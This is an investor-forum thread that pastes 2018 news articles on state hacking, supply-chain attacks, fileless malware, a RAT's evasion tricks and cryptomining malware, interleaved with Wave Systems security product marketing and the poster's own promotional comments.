Register for free to join our community of investors and share your ideas. You will also get access to streaming quotes, interactive charts, trades, portfolio, live options flow and more tools.
Register for free to join our community of investors and share your ideas. You will also get access to streaming quotes, interactive charts, trades, portfolio, live options flow and more tools.
China Is Still Stealing America’s Business Secrets, U.S. Officials Say
https://www.nextgov.com/cybersecurity/2018/07/china-still-stealing-americas-business-secrets-us-officials-say/150102/
The 2015 agreement between Xi and Obama produced only a lull in Beijing’s economic espionage.
The Chinese theft of U.S. intellectual property remains a “critical” threat, with perpetrators who have adapted to evade the structures of a 3-year-old ban on such hacking, according to a top-secret report intelligence officials sent to Congress this week.
It wasn’t supposed to be this way. In 2015, the U.S. and China signed an agreement to curb Chinese economic espionage over the Internet. That produced a “lull” in Chinese cyber theft, but did not stop it, William Evanina, the director of the National Counterintelligence and Security Center, told reporters Thursday. As the digital ecosystem continues to expand so does the threat posed by Chinese industrial cyber theft to America’s long-term economic power.
Evanina’s office made a shorter, unclassified version of the report available to journalists and to the public. It lists a variety of known cases of recent Chinese economic espionage, as well as other perpetrators of cyber economic espionage. But officials both during their briefing and in their report highlighted China.
“Most Chinese cyber operations against U.S. private industry that have been detected are focused on cleared defense contractors or IT and communications firms whose products and services support government and private sector networks worldwide,” it reads.
One such product, the report says, is CCleaner, a popular consumer application that removes unwanted files from computers. Chinese cyber actors penetrated its production process and pasted malicious code into the application before it shipped, potentially compromising the computers of its 2.3 million customers.
“We are not prepared as a nation to deal with the supply chain threat, holistically,” said Evanina.
“We believe that China will continue to be a threat to U.S.proprietary technology and intellectual property through cyber-enabled means or other methods. If this threat is not addressed, it could erode America’s long-term competitive economic advantage,” says the nonclassified version of the report.
Among the industries in which China and other foreign nations have the most interest are: energy and alternative energy; biotechnology; defense technology; environmental protection; a high-end manufacturing, and information and communications technology.
Evanina said the good news is that detection and reporting of cyber espionage has gotten much faster than it was a few years ago.
“Last year represented a watershed in the reporting of software supply chain operations. In 2017, seven significant events were reported in the public domain compared to only four between 2014 and 2016. As the number of events grows, so too are the potential impacts,” notes the report.
Michael Moss, the deputy director of the Cyber Threat Intelligence Integration Center, noted that reporting still isn’t keeping up with rapidly adapting hackers. “They’ll surprise me with how quickly they’ll move… how fast it continues to accelerate.”
The other piece of good news in the officials’ estimates: only a tiny slice of the exploits and vulnerabilities that hackers are using to conduct economic espionage are fancy zero-days that no one has ever seen, the sorts of bugs that you need a gymnasium full of cracker-jack military hackers to find. In fact, most are bugs and vulnerabilities that the public, and network managers, should already know about because they’re on the National Vulnerabilities Database, a massive public list of software bugs maintained by the National Institute of Standards and Technology. Software manufacturers will usually issue patches once a vulnerability in their software shows up on the list. But it’s up to individual IT managers at different companies and enterprises to then make sure that every machine is up to do date on all those patches.
“The trend is actually towards use of the less sophisticated, less expensive [publically known exploits.] That presents some second- and third-order complications, as well,” said Moss. ”One of the reasons that a nation state might be inspired to do that, since everybody’s using that tool, it’s harder to prove it was me that did it, right? Whereas if I have written custom code and I’ve used a certain tradecraft, I’ll do it a certain way, right? I’ll start to develop a…signature, right? I can be identified. Folks can say, ‘Hey, that looks like that. That’s usually used by country X, or country Y.’ But if I’m using that exploit tool that I downloaded, well, heck, the high school hackers are using that, too. So how do you know it was me? So the trend actually is towards the more widely-available…tools.”
A case in point, though not related to industrial espionage, theWannaCry attacks that crippled hospitals in 2017. Microsoft issued a patch in March, but slow adoption allowed the worst attacks to occur in June.
It’s one big reason Evanina is reaching out to Congress, and to industry, which owns the treasured and the buggy machines that make it vulnerable.
Patching continues to be “problematic,” he said, urging industry leaders to move toward “an enterprise-level solution.”
https://www.wavesys.com/products/wave-endpoint-monitor
Key Features:
Easy security compliance
• Comports with NIST guidelines for BIOS integrity
Data protection
• Ensures that you can trust the integrity of your measurements for central analysis
• Real-time alerts for zero-day detection of APTs
• Get Windows 8 Malware protection now—WEM covers previous versions of Windows
Simplicity
• Uses standards-based security that’s in every PC you own
• Measurement notifications and reports can be customized for your processes and work flows
• Centralized, remote activation and management of your TPMs
• E-discover which PCs in your organization are enabled for endpoint monitoring
No compromises
• Ensure host integrity—without expensive hardware or excessive administrative overhead
Windows 8 Tablet Compatibility
• Get the same device integrity assurance on Windows 8 Pro & Enterprise tablets that you want for your enterprise PCs - with Wave Mobility Pro - Tablet Edition
https://www.wavesys.com/malware-protection
Excerpt:
Software can’t always detect malware
The big problem with malware is that antivirus software doesn’t always detect it. Anti-malware software is based on signatures of known bad software. However, there always needs to be a patient 0 that discovers he is infected, for the rest of the world to benefit from it. In the case of APTs (Advanced Persistent Threats), your organization may be the only target for the specific strand of malware. In that case, the signature detection process will not protect you. Modern anti-malware and other software packages that promise cyber security or protection from APTs would use various heuristics and "AI" (Artificial Intelligence) to detect malware based on a predefined set of behavioral parameters. A sophisticated attacker is able to fine tune the behavior of the malware he is writing against various known anti-malware software solutions, so that it can evade detection for long periods of time.
A further challenge for anti-malware software is that it commonly works at the OS level. It isn’t very good at seeing deeper into the system, where some malware lives. Malware can hide from anti-malware by feeding it false results as it lies lower in the stack
Microsoft's got a new plan for managing Windows 10 devices for a monthly fee
If a company has remaining Windows 7, 8 and 8.1 machines in their corporate fleet sticking with them and Wave Products could be a good choice given the potential added monthly fee mentioned in the article. Also, Windows 10 seems to have been having significant problems with its updates. imo.
https://www.zdnet.com/article/microsofts-got-a-new-plan-for-managing-windows-10-devices-for-a-monthly-fee/
Microsoft is putting together a service aiming to take the pain out of procuring, provisioning and managing Windows 10 devices that it's currently calling the 'Microsoft Managed Desktop.'
Back in 2005, Microsoft conducted a trial via which it managed Windows PCs and servers for Energizer Holdings. The company quietly began selling this managed services offering to enterprises with more than 5,000 seats before ultimately turning the service into Office 365.
It looks like Redmond's about to try an updated variant of this strategy again.
Microsoft is getting closer to revealing its plans for what it's currently calling the "Microsoft Managed Desktop." (Petri.com discovered the name in some recent job postings.)
I'm hearing this Microsoft Managed Desktop is, basically, the Microsoft version of "desktop as a service." It will provide customers the ability to lease a Windows 10 device that's automatically provisioned for them and have the operating system kept up-to-date and more for a single monthly fee, my contacts say.
What differentiates Microsoft's version of desktop-as-a-service from what many companies already offer under that desktop-as-a-service name is the Windows 10 updating component.
As anyone who's been watching Windows 10 feature updates knows, many IT pros are unhappy about Microsoft's twice-yearly feature updates to the OS. They have seen updates break compatibility with things they didn't anticipate. They've seen Microsoft post and pull patches and updates to these releases, making deployment a nightmare. Windows as a service has been a rocky (or substitute your expletive of choice) road for many.
Microsoft looks to be counting on companies being ready for greater predictability -- in terms of spending, updating and support -- in exchange for letting someone else do the driving.
Microsoft already has a number of the pieces in place to make this happen. This past year, Microsoft has been broadening availability of its Windows Autopilot automatic device provisioning service. It's been honing its device financing skills with programs like Surface Plus and Surface Plus for Business, as well as its "Surface as a Service" leasing program. And it currently offers Windows 10, Office 365 and its Intune device-management and security products in the form of the Microsoft 365 subscription bundle.
Microsoft has a team working to put this all together into a new service. One of my contacts said that Bill Karagounis -- former Director of the Windows Insider Program & OS Fundamentals team, who last year joined the Enterprise Mobility and Management part of Windows and Devices -- is in charge of the coming Microsoft Managed Desktop.
What I don't know is how/whether Microsoft plans to allow partners to sell the Microsoft Managed Desktop platform and add value on top of it or if Microsoft intends to sell this directly to large enterprise customers itself (or both). A Microsoft spokesperson said the company had no comment on anything about Microsoft Managed Desktop.
Currently, some Microsoft partners are selling what sounds a lot like this Microsoft Managed Desktop service, but under the "Modern Workplace as a Service (MWaaS) banner. Microsoft has been using "Modern Workplace" to refer to its Microsoft 365 subscription bundle and related software/services.
CompNow, an Australian education, government and business services vendor, sells a Modern Workplace package that includes a Windows device of choice, Office 365, Windows 10, Enterprise Mobility + Security, managed IT services and helpdesk, a flexible warranty all for one monthly payment, according to the company's website.
Australian services provider CSA also offers a similar bundle of a device, applications and support for a single per user, monthly bill.
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/system/files/03-000378.1.02_BR_VSC.pdf
Two-Factor Authentication Usable or Not? A Two-Phase Usability Study of the FIDO U2F Security Key
https://www.blackhat.com/us-18/briefings.html
Why do people choose to use (or not use) Two Factor Authentication (2FA)? We report on some surprising results from a two-phase study on the Yubico Security Key working with Yubico. Despite the Yubico Security Key being among the best in class for usability among hardware tokens, participants in a think-aloud protocol encountered surprising difficulties, with none in the first round able to complete enrollment without guidance. For example, a website demo, built to make adoption simple, instead resulted in profound confusion when participants fell into an infinite loop of inadvertently only playacting the installation. We report on this and other findings of a two phase experiment that analyzed acceptability and usability of the Yubico Security Key, a 2FA hardware token implementing Fast Identity Online (FIDO). We made recommendations, and then tested the new interaction. A repeat of the experiment showed that these recommendations enhanced ease of use but not necessarily acceptability. The second stage identified the remaining primary reasons for rejecting 2FA: fear of losing the device, illusions of personal immunity to risk on the internet, and confidence in personal risk perceptions. Being locked out of an account was something every participant had suffered while losing control of their account was a distant, remote, and heavily discounted risk. The presentation will surprise and inform the practitioners, showing them that usability is not just common sense, in fact, sometimes you need to think sideways to align yourself with your potential users.
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpts:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
What will you do with >50% TCO savings?*
Tokens and smart cards require an additional hardware purchase, plus the time and money to ship to remote users. Use something that’s already in the users’ hands (the TPM), and your acquisition and deployment costs are lower.
Then consider the management savings in not having to replace lost and stolen tokens. That means fewer helpdesk calls, less interruption of user productivity, and fewer acquisition and shipping costs.
Detecting Credential Compromise in AWS
https://www.blackhat.com/us-18/briefings.html
Credential compromise in the cloud is not a threat that one company faces, rather it is a widespread concern as more and more companies operate in the cloud. Credential compromise can lead to many different outcomes depending on the motive of the attacker who compromised the credentials. In some cases in the past, it has led to erroneous AWS service usage for bitcoin mining or other non-destructive yet costly abuse, and in others it has led to companies shutting down due to the loss of data and infrastructure.
This paper describes an approach for detection of compromised credentials in AWS without needing to know all IPs in your infrastructure beforehand.
Presented By
William Bengtson
Employee credential protection could work through:
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpts:
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
One helpdesk call you'll never get: "I lost my virtual smart card again..."
There are so many ways to lose a token – couch cushions, street drains, curious toddlers. In fact, up to 30% of all tokens are eventually lost. It’s much harder to lose a laptop, and you notice a lot faster when you do.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around
Cyber security experts warn of spike in ‘fileless’ hacking attacks
===Post 245253 and 245255 are interesting and good reading. Thanks Methinks.
https://www.thehindubusinessline.com/info-tech/cyber-security-experts-warn-of-spike-in-fileless-hacking-attacks/article24539407.ece
Cyber security experts have noticed a spike in fileless malware attacks, which take advantage of the trust factor between security software and genuine, signed Windows applications. As they leave no trace in the system, ensuring a zero footprint in the computer system, it is difficult to notice the presence of the malware attack.
“Because this type of attack is launched through reputable, trusted executables, these attacks are hard to detect,” Internet security solutions firm McAfee Labs said.
It says the rapid rise of such attacks is a cause for concern. Unlike in traditional attacks where hackers sneak into systems by launching malware applications, fileless malware attacks do not install any software on a user’s computer.
“This makes a successful attack extremely hard to detect. Both consumers and corporate users can fall victim to this threat. In corporate environments, attackers use this vector to move laterally through the network,” McAfee points out.
Cyber security expert, Debasish Mandal, says CactusTorch is an example of a ‘fileless’ threat. It adopts the DotNetToJScript technique, which loads and executes malicious applications straight from memory. “These assemblies are the smallest unit of deployment of an application, such as a .dll or .exe. The malware does not write any part of the malicious .NET assembly on a computer’s hard drive,” he points out.
This makes traditional file scanners ineffective in detecting these intrusions. “We have seen a rapid growth in the use of CactusTorch this year. This can execute custom shellcode on Windows systems,” he says.
Many fileless malware campaigns have leveraged Microsoft PowerShell to launch attacks in memory, to create a back-door into a system. “What’s interesting is the number of variants discovered,” he says.
============================================================
https://www.wavesys.com/products/wave-endpoint-monitor
Detect attacks before it’s too late
Malware can do its work for weeks or months before you ever know it’s there. But with Wave Endpoint Monitor, you can spot malware before it has a chance to cause damage.
Antivirus software can’t detect rootkits and other malware; it works at the level of the OS and isn’t very good at seeing deeper into the system. For example, it can’t tell whether the boot record is lying. The Wave alternative is to work with the Trusted Platform Modules (TPMs), or security chips, embedded in your devices. By using the TPM to attest to the security of the device each time that device boots, Wave looks below the operating system and can help detect threats lurking there. Every time a device boots up, Wave Endpoint Monitor makes a comparison against previous boot values, and if anything deviates from the norm, it alerts you immediately.
Russian Hack Into US Power Grid Began With Stolen Passwords
Wave Systems' products could someday save the World.
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.nbcwashington.com/news/national-international/Russian-Hackers-US-Power-Grid-489228711.html
Russian hackers who penetrated hundreds of U.S. utilities, manufacturing plants and other facilities last year gained access by using the most conventional of phishing tools, tricking staffers into entering passwords, officials say.
The Russians targeted mostly the energy sector but also nuclear, aviation and critical manufacturing, Jonathan Homer, head of Homeland Security's industrial control system analysis, said during a briefing Wednesday.
They had the capability to cause mass blackouts, but chose not to, and there was no threat the grid would go down, the officials said. Instead, the hackers appeared more focused on reconnaissance.
The 2017 attack prompted a rebuke from the Trump administration earlier this year.
The victims ranged from smaller companies with no major budget for cybersecurity to large corporations with sophisticated security networks, Homer said. Vendors were targeted because of their direct access to the utilities — companies that run diagnostics or update software or perform other tasks to keep the systems running. The victims were not identified.
"This is a situation where they went in and said this is what they're looking for, and found weaknesses there," Homer said.
The newly disclosed details of the 2017 hack come amid growing concerns over Russia's efforts to interfere in the November midterm elections and the recent indictments of a dozen Russian military intelligence officers accused of infiltrating the Clinton presidential campaign and the Democratic Party and releasing tens of thousands of private communications.
•Remains Said to Be US War Dead Repatriated From North Korea
U.S. national security officials previously said they had determined that Russian intelligence and others were behind the cyberattacks. They said the hackers chose their targets methodically, obtained access to computer systems, conducted "network reconnaissance" and then attempted to cover their tracks by deleting evidence of the intrusions. The U.S. government said it had helped the industries expel the Russians from all systems known to have been penetrated.
It wasn't clear if more had been compromised since news of the attack was made public earlier this year. Wednesday's briefing was intended to help businesses defend themselves from future attacks.
Homer said the attack began in 2016 with a single breach that stayed dormant nearly a year before other infiltrations occurred in concentric circles closer and closer to the U.S. systems.
Hackers used a mix of real people downloading open-source information from company websites like photos and other data, and attacks that trick employees into entering passwords on spoofed websites. Hackers then use the passwords to compromise corporate networks. It's possible some of the companies are unaware they were compromised, because hackers used credentials of actual employees to get inside, which could make it harder to detect, officials said.
Highly Sophisticated Parasite RAT Emerges on the Dark Web
It seems like Wave Endpoint Monitor with its credentials could be one of only a few anti malware programs that could stop this malware. Or rather there are many anti malware programs that would allow this malware to take over a computer. imo.
https://threatpost.com/highly-sophisticated-parasite-rat-emerges-on-the-dark-web/134478/
This brand-new RAT represents the latest escalation in an ongoing malware arms race that extends even to commodity malware.
Researchers are tracking a remote access trojan (RAT) on underground markets that, so far, has only been attributed to one small malicious email campaign. However, the RAT, dubbed Parasite HTTP by the Proofpoint researchers that discovered it, has an impressive list of sophisticated features – raising concerns over future attacks.
The ad for the malware on the Dark Web reads, “Parasite HTTP is a professionally coded modular remote administration tool for windows written in C that has no dependencies except the OS itself. With the stub size of ~49KB and plugin support it presents perfect solution for controlling large amount of computers from a remote location.”
Like most RATs, Parasite HTTP offers extensive information-stealing capabilities, VNC for unobtrusively observing or controlling a PC and user management for bypassing permissions. It also advertises capabilities such as firewall bypass, optional system-wide persistence and injection to white-listed system processes. And, like legitimate software, Parasite HTTP includes administrator perks, like backups, analysis views and activity statistics, a secure log-in page with CAPTCHA, an advanced task management system and password recovery. It also features encryption for its C2 communications.
Where it really shines though is with an array of sandbox detection, anti-debugging, anti-emulation and other protections for evading detection and analysis.
“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates,” Proofpoint researchers said in a posting on Wednesday. “Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems.”
The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post-infection.
Sherrod DeGrippo, director of emerging threats for Proofpoint, told Threatpost that having so many techniques aggregated in a single piece of commodity malware marks a new chapter in bad code.
“We frequently see one or more of these techniques appear in a variety of malware, but for all of them to appear in a single piece of malware, readily available for sale on underground forums, is unusual,” he explained.
The spam campaign that served as the RAT’s coming-out party was fairly straightforward, according to Proofpoint. It targeted the IT, healthcare and retail industries, using HR distribution lists and Word document attachments purporting to be resumes and CVs. Once opened, the documents used weaponized macros to fetch Parasite HTTP from a remote site.
While the attack vector is familiar, Parasite HTTP should put the security community on notice, researchers said.
“For consumers, organizations and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware like Parasite,” they wrote. “While we have currently only observed Parasite HTTP in a small campaign, we expect to see features like those used in Parasite continue to propagate across other malware variants.”
DeGrippo told us, “A fairly robust RAT that is difficult to detect, utilizes sophisticated anti-analysis features, and is also readily available for purchase means that both defenders and organizations need to implement dynamic detection capabilities that incorporate deep threat intelligence to stay ahead of the curve.”
State-of-the-Art Evasion Techniques
The researchers detailed several of Parasite HTTP’s most interesting evasion attributes, including obfuscated strings, sandbox evasion via sleep manipulation, the use of researcher code from Github for sandbox detection and others.
When it comes to obfuscated strings of code, Parasite HTTP contains four routines, preceded by a 6-byte header.
“For each type of string, ASCII or Unicode, one variant leaves the obfuscated string in place and returns a dynamically-allocated, deobfuscated version of the string,” researchers said. “The other variant uses VirtualProtect to deobfuscate the string in place, setting the XOR key to 0 after the deobfuscation has been performed, which effectively skips deobfuscation during future access to the string.”
Parasite HTTP also uses a sleep routine to delay execution and check for sandboxes or emulation. It sleeps in 10-millisecond intervals, while detecting sandbox environments by checking for the passage of time and non-interference with its own handling of breakpoint instructions
“The sandbox-checking routine…checks whether between 900 milliseconds and two seconds elapsed in response to the routine’s one-second sleep, split into 10ms increments,” researchers explained. “Sandboxes using code like that available in [Github] for example, would have run afoul of this particular sandbox check.”
Parasite HTTP adapts code from Github for its own sandbox detection purposes. The code is copied verbatim, with the API resolution replaced with its own internal code, the prints removed, and the file and environment variable names generated randomly, the analysts said. Meanwhile, when Parasite HTTP actually does detect a sandbox, it doesn’t make any sudden moves that might tip off researchers.
“It does not simply exit or throw an error, instead making it difficult for researchers to determine why the malware did not run properly and crashed,” researchers said. “Parasite HTTP uses its sandbox detection in a clever way to result in a later crash, on attempting to use a buffer whose allocation was skipped.”
Meanwhile, Parasite HTTP resolves certain critical APIs by using a DLL remapping technique to hide behaviors like process injection.
“While previously documented, [the technique] has not, to our knowledge, been used recently in other major malware families,” according to Proofpoint.
In its initial process, Parasite HTTP removes hooks on the aforementioned DLLs by reading them in from disk and comparing the first five bytes of each exported function to that present in the currently mapped version in memory. This allows its activities to be quiet.
“Though this technique is naive in its implementation, not making use of any instruction decoder and limiting itself to five hardcoded bytes, it is effective in practice,” the researchers noted. “Mapping the new copy of NTDLL effectively provides it with a copy free of any hooks placed on the initial NTDLL mapping, rendering its thread injection and registry modifications invisible to most users and hooking implementations. Further, since this mapping is accomplished with NtOpenSection and NtMapViewOfSection, it will not involve the typical calls to filesystem APIs used by other variants of the technique to achieve the same goal.”
And finally, it features obfuscated checking for breakpoints within critical functions, using additional code from GitHub.
“This functionality is only used in one location to check a single function in the malware that calls out to the sandbox detection,” researchers said. They added that on this front, the RAT isn’t fully baked.
“It is worth noting that this technique is naive and unreliable long-term over arbitrary code, as unintentional 0xcc bytes can be found in a simple byte-by-byte scan of code through certain instruction encodings, local stack frame offsets, relative references, indirect addresses or immediate constants,” they said.
https://www.wavesys.com/malware-protection
Wave’s solution: start with the device
If antivirus software doesn’t work, what does? The Wave alternative relies not on superficial layers of software but on standards-based hardware: self-encrypting drives (SEDs) and Trusted Platform Modules (TPMs), or security chips, that are already embedded in many of your computers and mobile devices. This hardware provides you with secure storage. When you turn the SED and TPM on and manage them with Wave, you suddenly have a broad, deep view into your network. Among other things, you’ll know immediately whether any one of your devices—computers, laptops, tablets, smartphones—has been tampered with. But Wave is proactive too: you can block the kinds of behaviors that invite malware in. Wave's Endpoint Monitor provides early detection for these low-lying sneaky attacks.
This new cryptomining malware targets business PCs and servers
https://www.zdnet.com/article/this-new-cryptomining-malware-targets-business-pcs-and-servers/
Researchers have uncovered a cryptojacking campaign that looks to spread across infected networks to ensure as much mining profit as possible.
A new form of cryptocurrency-mining malware is targeting corporate networks across the world, employing a combination of PowerShell and EternalBlue to stealthily spread.
Dubbed PowerGhost, the fileless malware can secretly embed itself on a single system on a network then spread to other PCs and servers across organisations.
The cryptojacker has been uncovered by researchers at security company Kaspersky Lab, who detected it on corporate networks across the globe, with the largest concentration of infections in India, Brazil, Columbia, and Turkey. PowerGhost has also been detected across Europe and North America.
Cryptocurrency mining malware secretly uses the power of infected systems to mine for cryptocurrency, which is sent to the attackers' wallet. The more machines that are infected, the more illicit profits the attackers can make.
Infections begin with the use of exploits or remote administration tools such as Windows Management Instrumentation. PowerGhost also uses fileless techniques to discreetly go about its business and ensure it isn't detected on the network.
By adopting this tactic, the PowerGhost miner isn't stored directly on the hard drive of the infected machine, making it harder to detect.
PowerGhost itself is an obfuscated PowerShell script which contains add-on modules for the miner's operation such as mimikatz, which helps it obtain account credentials of infected machines, as well as a shellcode for deploying the notorious EternalBlue exploit to spread around the network.
EternalBlue is the leaked NSA hacking tool which went on to power the WannaCry and NotPetya attacks, and it's still being used by crooks over a year later.
After one machine is infected with PowerGhost, EternalBlue can spread it around the rest of the network, then with the aid of mimikatz it can steal credentials, aiding its spread and allowing the escalation of privileges using CVE-2018-8120.
Once PowerGhost is embedded onto machines, it can perform its task of mining for cryptocurrency -- and detection rates for the malware suggest that those behind it are particularly keen to compromise corporate networks in order to make as much money as quickly as possible.
"PowerGhost raises new concerns about crypto-mining software. The miner we examined indicates that targeting consumers is not enough for cybercriminals anymore - threat actors are now turning their attention to enterprises too. Crypto-currency mining is set to become a huge threat to the business community," said David Emm, principal security researcher at Kaspersky Lab.
Researchers note that one version of PowerGhost can also be used for conducting DDoS attacks, something which those behind the malware are likely to be using as an additional means of income.
Cryptocurrency mining malware has risen to become one of the most popular means of cybercriminals making money, even surpassing ransomware when it comes to turning a profit.
To avoid corporate networks falling victim to mining malware, researchers recommend software is kept patched and up to date in order to prevent miners exploiting known vulnerabilities like EternalBlue.
Organisations are also urged to not overlook less obvious targets for attacks such as queue management systems, POS terminals, and vending machines, because cryptojackers don't need much power to operate, so can easily take advantage of these often-forgotten about, low-powered systems.
https://www.wavesys.com/products/wave-endpoint-monitor
Detect attacks before it’s too late
Malware can do its work for weeks or months before you ever know it’s there. But with Wave Endpoint Monitor, you can spot malware before it has a chance to cause damage.
Antivirus software can’t detect rootkits and other malware; it works at the level of the OS and isn’t very good at seeing deeper into the system. For example, it can’t tell whether the boot record is lying. The Wave alternative is to work with the Trusted Platform Modules (TPMs), or security chips, embedded in your devices. By using the TPM to attest to the security of the device each time that device boots, Wave looks below the operating system and can help detect threats lurking there. Every time a device boots up, Wave Endpoint Monitor makes a comparison against previous boot values, and if anything deviates from the norm, it alerts you immediately.
An open standard means Wave works with everything
Wave Endpoint Monitor works on your existing hardware, across platforms. That’s because our solutions are based on an open standard that’s already been implemented on many laptops and is now working its way onto mobile devices. We’re talking about those TPMs. We just don’t think that expensive new equipment and vendor lock-in are great selling points.
Be proactive on compliance
No new regulations here—yet. But government agencies recognize malware as a growing threat. In 2011, NIST published guidelines for basic input/output system (BIOS) integrity measurement, the BIOS being what initializes a computer when it boots up. When this critical system is malware’s target, the consequences are big. The guidelines describe what’s needed to establish a chain of trust for the BIOS: Has it been tampered with? NIST actually looked to Wave for feedback on this document (see the acknowledgments). We know what’s needed, because Wave Endpoint Monitor is already doing it.
=============================================================
In reference to mimikatz and stealing credentials in the article. Wave VSC 2.0 could help in that situation.
https://www.wavesys.com/products/wave-virtual-smart-card
Microsoft acknowledges price increases coming for Office 2019 and Windows 10 Enterprise users
Given the cost, cost increases for Windows 10 and Office 2019 and the cost effective/better cybersecurity available from Wave Systems, companies may want to upgrade to Windows 10 and Office 2019 further in the future and use Wave System's products now.
https://www.zdnet.com/article/microsoft-acknowledges-price-increases-coming-for-office-2019-and-windows-10-enterprise-users/
Microsoft will be making some pricing and naming changes as of its October 2018 price list that will affect some Windows 10 and Office 2019 customers. Here's what's in store.
Microsoft has price increases in store for some of its Office and Windows customers as of October 1, 2018
In a July 25 blog post, Microsoft officials acknowledged the coming increases.
Office 2019, the next on-premises version of Office clients and servers which Microsoft is currently testing ahead of its launch later this year, will see increases of 10 percent over current on-premises pricing. This price increase is for commercial (business) customers and will affect Office client, Enterprise Client Access License (CAL), Core CAL and server products, officials said.
Microsoft also is rejiggering how it refers to Windows 10 Enterprise E3 and related pricing.
As of October, Microsoft will be using the E3 name for the per-user version (not the per-device one). Windows 10 Enterprise E3 per User will be rechristened "Windows 10 Enterprise E3." And the current Windows 10 Enterprise E3 per Device will be renamed "Windows 10 Enterprise."
According to Microsoft's blog post, the price of Windows 10 Enterprise will be raised to match the price of Windows 10 Enterprise E3. Windows 10 Enterprise E3 costs $84 per user per year. Microsoft also is discontinuing Windows 10 Enterprise E5 per device as of October 1, 2018. Only the per user version will remain, which costs $14 per user per month, or $168 per user per year
Based on Microsoft's blog post, I don't think the naming of Microsoft 365 Enterprise E3 or E5 will be impacted. I've asked if there will be any price increases; no word back yet. Update: A company spokesperson said the company had no comment on whether this means price increases for Microsoft 365.
Microsoft originally introduced Windows 10 Enterprise subscription plans (E3 and E5) at its worldwide partner conference in 2016. Microsoft's plan then was to use these subscription bundles to try to win over more small-and-midsize (SMB) customers.
Microsoft officials said in today's blog post that the changes are meant to create more consistency and transparency across purchasing channels. Other changes that will be on the October price list:
•Establishment of a single, consistent starting price across all programs aligned to web direct for online services (OLS)
•Removal of the programmatic volume discounts (Level A and Open Level C) in Enterprise Agreement (EA)/EA Subscription, MPSA, Select/ Select Plus, and Open programs (Open, Open Value, Open Value Subscription)
•Alignment of government pricing for on-premises and online services to the lowest commercial price in EA/EAS, MPSA, Select Plus, and Open Programs
•Delivery of a newly designed Customer Price Sheet that better outlines how a customer's price was derived (direct EA/EAS only)
Microsoft told its reseller partners at its recent Inspire partner conference that it was moving toward the goal of providing "one consistent set of offers, supported by a Modern Commerce platform" in this coming fiscal year. (New buzzword of the year nomination by me: Modern!)
By updating discounting policies meant to sell software at scale, Microsoft officials said they will no longer be "incentivizing them (customers) to standardize unnecessarily on software."
ERP security warning as hackers step up attacks on systems
If SAP or Oracle is an application used within Wave VSC 2.0 and Wave Endpoint Monitor is used to protect the computer from malware, SAP and Oracle users could be much better protected while all of these flaws are in transition to be updated or the software is upgraded (probably not a cheap proposition). imo.
https://www.zdnet.com/article/erp-security-warning-as-hackers-step-up-attacks-on-systems/
Vulnerable ERP applications are being increasingly targeted by attackers
The US Department of Homeland Security has warned businesses of the growing risk of attackers targeting enterprise resource planning (ERP) systems.
An alert posted by the United States Computer Emergency Readiness Team (US-CERT) warned that attackers are seeking to exploit vulnerabilities in ERP systems to access sensitive information.
ERP systems make an appealing target for hackers, as they run business-critical processes and house sensitive corporate information, which can be used for cyber espionage, sabotage, and fraud.
In some cases, systems are left exposed, with thousands of ERP applications directly connected to the internet, providing a tempting -- and lucrative -- target for attackers.
The US-CERT alert follows the release of a joint report by security firms Digital Shadows and Onapsis into the threats hackers pose to ERP systems.
While companies like SAP and Oracle issue patches for their ERP products, customers can struggle to apply them due to complex system architectures, customised functionality, or even lack of knowledge about the patching process. These difficulties can then be exploited by attackers.
"You've got the real holy grail, which is the remote code execution exploits, then if that's combined with an internet-facing application, that's really sought after," Mike Marriott, security analyst at Digital Shadows, told ZDNet.
ERP systems can be more vulnerable to attack if the applications they support are connected to the internet. Researchers identified more than 17,000 SAP and Oracle ERP applications connected to the internet, many of which belonged to large commercial and government organisations in the US, UK, and Germany
"There are lots of internet-facing SAP and Oracle applications that are quite easy to find through Google Dorks, then lots of exploitable vulnerabilities available online with remote code execution," said Marriott.
Many of these exposed applications are vulnerable to attack and information about those at risk is shared on the dark web and in criminal forums. According to the report, there's been a 160 percent increase in the activity and interest in ERP-specific vulnerabilities from 2016 to 2017.
One way that attackers are exploiting vulnerabilities in ERP infrastructure is by using them to infect corporate networks with malware.
The latest incarnation of a common banking trojan malware Dridex has the ability to target SAP systems. Once installed on a system, this version of Dridex seeks out users of SAP software and harvests their credentials, along with sensitive business data.
But it isn't just criminals targeting these systems -- the report warns that nation-state sponsored attackers are targeting ERP applications for cyber espionage and sabotage.
Perhaps the most infamous example of this is the breach at the United States Information Service (USIS), which at the time was the biggest commercial provider of background information to the US federal government.
The attack, later found to be the work of state-sponsored Chinese hackers, began with an exploited SAP vulnerability and resulted in the exposure of thousands of sensitive records.
The Digital Shadows report warns that nation-state attackers continue to use ERP vulnerabilities as backdoors into systems.
"These attacks are under-reported and that can lead people to have to take the security of these applications less seriously than they should," said Marriott.
"People have to face up to how these applications hold really sensitive information, there a lot of vulnerabilities, a lot of them are still internet facing and criminals are making use of this. So make sure you're patching regularly and not using default passwords."
Google Employees' Secret to Never Getting Phished Is Using Physical Security Keys
See the link at the end of the article for reasons it could be a better idea to get Wave VSC 2.0 than to use the keys Google has selected for its multifactor authentication. One other reason not mentioned in the link is the environmental implications of all the shipping, the devices themselves, and where the shipping packaging ends up. Wave VSC 2.0 doesn't have a negative environmental impact like Yubikey and RSA Securid and the product is better overall. imo.
https://gizmodo.com/google-employees-secret-to-never-getting-phished-is-usi-1827833717
